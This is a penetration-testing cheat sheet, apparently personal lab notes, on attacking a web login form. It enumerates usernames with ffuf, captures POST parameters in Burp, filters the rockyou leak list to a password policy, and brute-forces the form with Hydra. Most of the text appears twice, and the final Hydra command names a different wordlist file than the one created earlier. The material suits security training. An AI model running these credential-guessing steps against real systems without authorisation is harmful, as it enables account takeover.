HYDRA

01.USER ENUMERATION

#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Unknown user"

#automate the process of enumerating usernames
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output

#after identifying valid usernames, proceed by attempting to brute-force the user's password

02.IDENTIFY ERROR MESSAGE

root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * send expected output
 
#identified incorrect credential message
 * unknown user
 * invalid credentials

03.IDENTIFY POST PARAMETERS

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the expected user input
 

POST /index.php HTTP/1.1
Host: 83.136.254.158:51572
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2j030ocgj9kbs0a18lai9m6dvg

username=test&password=test
 * identified post parameters as username=x&password=x

04.CRAFT CUSTOM PWLIST

#tailor the password to the organization's password list (if known)
 Minimum Length: 10 characters
 Must Include:
  At least one uppercase letter
  At least one lowercase letter
  At least one number
 
#
root@oco:~$ cp /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt .
root@oco:~$ wc -l rockyou.txt
 * 14344391
root@oco:~$ grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > customPWList.txt
root@oco:~$ wc -l customPWList.txt
 * 151647

root@oco:~$ hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

PreviousWEB LOGIN FORMS NextFFUF

Last updated 4 months ago

01.USER ENUMERATION

#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Unknown user"

#automate the process of enumerating usernames
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output

#after identifying valid usernames, proceed by attempting to brute-force the user's password

root@oco:~$ BROWSER > {targetSite:port} username field: {arbitraryValue} password field: {arbitraryValue} * send expected output #identified incorrect credential message * unknown user * invalid credentials

03.IDENTIFY POST PARAMETERS

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the expected user input
 

POST /index.php HTTP/1.1
Host: 83.136.254.158:51572
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2j030ocgj9kbs0a18lai9m6dvg

username=test&password=test
 * identified post parameters as username=x&password=x

04.CRAFT CUSTOM PWLIST

#tailor the password to the organization's password list (if known)
 Minimum Length: 10 characters
 Must Include:
  At least one uppercase letter
  At least one lowercase letter
  At least one number
 
#
root@oco:~$ cp /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt .
root@oco:~$ wc -l rockyou.txt
 * 14344391
root@oco:~$ grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > customPWList.txt
root@oco:~$ wc -l customPWList.txt
 * 151647

root@oco:~$ hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"